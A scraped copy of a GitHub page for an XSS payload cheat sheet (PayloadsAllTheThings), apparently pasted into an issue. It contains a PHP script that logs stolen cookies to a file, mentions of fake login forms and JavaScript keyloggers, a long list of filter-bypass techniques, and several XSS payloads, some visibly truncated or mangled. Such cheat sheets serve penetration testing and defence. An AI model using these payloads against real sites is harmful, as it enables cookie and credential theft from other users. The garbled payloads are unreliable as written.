Open lab-sandbox opened 3 years ago
Skip to content Pull requests Issues Marketplace Explore @sbakhour Learn Git and GitHub without any code!
Using the Hello World guide, you’ll start a branch, write comments, and open a pull request. swisskyrepo / PayloadsAllTheThings
1.3k 22.5k
6.6k
Code Issues 10 Pull requests Actions Projects Security
Insights
PayloadsAllTheThings/XSS Injection/ Latest commit @lapolis lapolis Added closing bracket in unicode full width bypass 6f758ba on Jan 15 Git stats
History
Files Type Name Latest commit message Commit time . . Files XSS Google Scholar Payload + Skeleton Key Persistence 10 months ago Images Fix name's capitalization 2 years ago Intruders Create 0xcela_event_handlers.txt 14 months ago README.md Added closing bracket in unicode full width bypass 2 months ago XSS in Angular.md [Update] Added 1 payload 7 months ago XSS with Relative Path Overwrite.md Fix name's capitalization 2 years ago README.md Cross Site Scripting
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. Summary
Exploit code or POC
Data grabber for XSS
UI redressing
Javascript keylogger
Other ways
Identify an XSS endpoint
XSS in HTML/Applications
Common Payloads
XSS using HTML5 tags
XSS using a remote JS
XSS in hidden input
DOM based XSS
XSS in JS Context
XSS in wrappers javascript and data URI
XSS in files (XML/SVG/CSS/Flash/Markdown)
XSS in PostMessage
Blind XSS
XSS Hunter
Other Blind XSS tools
Blind XSS endpoint
Mutated XSS
Polyglot XSS
Filter Bypass and Exotic payloads
Bypass case sensitive
Bypass tag blacklist
Bypass word blacklist with code evaluation
Bypass with incomplete html tag
Bypass quotes for string
Bypass quotes in script tag
Bypass quotes in mousedown event
Bypass dot filter
Bypass parenthesis for string
Bypass parenthesis and semi colon
Bypass onxxxx= blacklist
Bypass space filter
Bypass email filter
Bypass document blacklist
Bypass using javascript inside a string
Bypass using an alternate way to redirect
Bypass using an alternate way to execute an alert
Bypass ">" using nothing
Bypass "<" and ">" using < and >
Bypass ";" using another character
Bypass using HTML encoding
Bypass using Katana
Bypass using Cuneiform
Bypass using Lontara
Bypass using ECMAScript6
Bypass using Octal encoding
Bypass using Unicode
Bypass using UTF-7
Bypass using UTF-8
Bypass using UTF-16be
Bypass using UTF-32
Bypass using BOM
Bypass using weird encoding or native interpretation
Bypass using jsfuck
CSP Bypass
Common WAF Bypass
Exploit code or POC Data grabber for XSS
Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page.
Write the collected data into a file.
<?php $cookie = $_GET['c']; $fp = fopen('cookies.txt', 'a+'); fwrite($fp, 'Cookie:' .$cookie."\r\n"); fclose($fp); ?>
UI redressing
Leverage the XSS to modify the HTML content of the page in order to display a fake login form.
Javascript keylogger
Another way to collect sensitive data is to set a javascript keylogger.
Other ways
More exploits at http://www.xss-payloads.com/payloads-list.html?a#category=all:
Taking screenshots using XSS and the HTML5 Canvas
JavaScript Port Scanner
Network Scanner
.NET Shell execution
Redirect Form
Play Music
Identify an XSS endpoint
Tools
Most tools are also suitable for blind XSS attacks:
XSSStrike: Very popular but unfortunately not very well maintained
xsser: Utilizes a headless browser to detect XSS vulnerabilities
Dalfox: Extensive functionality and extremely fast thanks to the implementation in Go
XSpear: Similar to Dalfox but based on Ruby
domdig: Headless Chrome XSS Tester
XSS in HTML/Applications Common Payloads
// Basic payload
<scr ">
// Img payload <img src=x onerror=alert('XSS');> <img src=x onerror=alert('XSS')//
"><img src=x onerror=alert('XSS');> ">
// Svg payload <svgonload=alert(1)> <svg/onload=alert('XSS')> <svg onload=alert(1)// <svg/onload=alert(String.fromCharCode(88,83,83))>
%0ajavascript:
/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">
%0ajavascript:/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">
Originally posted by @lab-sandbox in https://github.com/60-2balert-1-2b-60/-svg-onload-prompt-document.domain-/issues/1#issuecomment-791824497